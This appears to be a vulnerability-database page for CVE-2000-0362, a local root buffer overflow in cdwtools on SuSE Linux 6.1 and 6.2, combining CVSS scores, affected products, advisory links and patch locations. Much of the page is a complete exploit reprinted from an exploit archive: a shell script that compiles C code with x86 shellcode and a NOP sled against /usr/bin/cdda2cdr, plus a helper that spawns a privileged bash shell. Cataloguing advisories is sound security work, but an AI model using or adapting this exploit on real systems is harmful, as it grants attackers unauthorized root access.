CVE-2000-0362
CVSS 7.2
Published: 1999-10-22 00:00:00
Revised: 2008-09-10 15:04:13

[Original] Buffer overflows in Linux cdwtools 093 and earlier allow local users to gain root privileges.


[CNNVD] Linux cwdtools vulnerability (CNNVD-199910-038)

        Linux cdwtools 093 and earlier versions contain a buffer overflow vulnerability. A local user can exploit it to obtain root privileges.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system shutdown]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/o:suse:suse_linux:6.2  SuSE SuSE Linux 6.2
cpe:/o:suse:suse_linux:6.1  SuSE SuSE Linux 6.1

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0362
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0362
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199910-038
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/738
(UNKNOWN)  BID  738
http://www.novell.com/linux/security/advisories/suse_security_announce_25.html
(UNKNOWN)  SUSE  19991019 Security hole in cdwtools < 093

- Vulnerability information

Linux cwdtools vulnerability
High risk  Buffer overflow
1999-10-22 00:00:00  2005-08-02 00:00:00
Local
        Linux cdwtools 093 and earlier versions contain a buffer overflow vulnerability. A local user can exploit it to obtain root privileges.

- Advisory and patches

        S.u.S.E offers patched packages at the location below:
        ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/cdwtools-0.93-101.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/cdwtools-0.93-100.i386.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.1/ap1/cdwtools-0.93-101.alpha.rpm

- Vulnerability information (19565)

S.u.S.E. Linux 6.1/6.2 cwdtools Vulnerabilities (EDBID:19565)
linux local
1999-10-22 Verified
Author: Brock Tellier
N/A
source: http://www.securityfocus.com/bid/738/info

cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. 

--- cdda2x.sh ---
#! /bin/sh
#
# Shell script for Linux x86 cdda2cdr exploit
# Brock Tellier btellier@usa.net
#

cat > /tmp/cdda2x.c <<EOF

/**
 ** Linux x86 exploit for /usr/bin/cdda2cdr (sgid disk on some Linux distros)

 ** gcc -o cdda2x cdda2x.c; cdda2x <offset> <bufsiz>
 ** 
 ** Brock Tellier btellier@usa.net 
 **/


#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */

char exec[]= /* Generic Linux x86 running our /tmp program */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/cd";



#define LEN 500
#define NOP 0x90

unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}


void main(int argc, char *argv[]) {

int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];

 if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
 exit(0);
 }
 else if (argc == 2){
   offset=atoi(argv[1]);

 }
 else if (argc == 3) {
   offset=atoi(argv[1]);
   buflen=atoi(argv[2]);

 }
 else {
   offset=500;
   buflen=500;

 }


addr=get_sp();

fprintf(stderr, "Linux x86 cdda2cdr local disk exploit\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),exec,strlen(exec));
for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)
 *(int *)&buf[i]=addr+offset;

execl("/usr/bin/cdda2cdr", "cdda2cdr", "-D", buf, NULL);


/*
for (i=0; i < strlen(buf); i++) putchar(buf[i]);
*/

}

EOF

cat > /tmp/cd.c <<EOF
#include <stdlib.h>   /* system */
#include <unistd.h>   /* setregid, getegid */

int main(void) {
    setregid(getegid(), getegid());
    system("/bin/bash");
    return 0;
}
EOF

gcc -o /tmp/cd /tmp/cd.c
gcc -o /tmp/cdda2x /tmp/cdda2x.c
echo "Note that gid=6 leads to easy root access.."
/tmp/cdda2x


- Vulnerability information

1123
Linux cwdtools cdda2cdr Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- Vulnerability description

- Timeline

1999-09-30 Unknown
1999-10-22 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete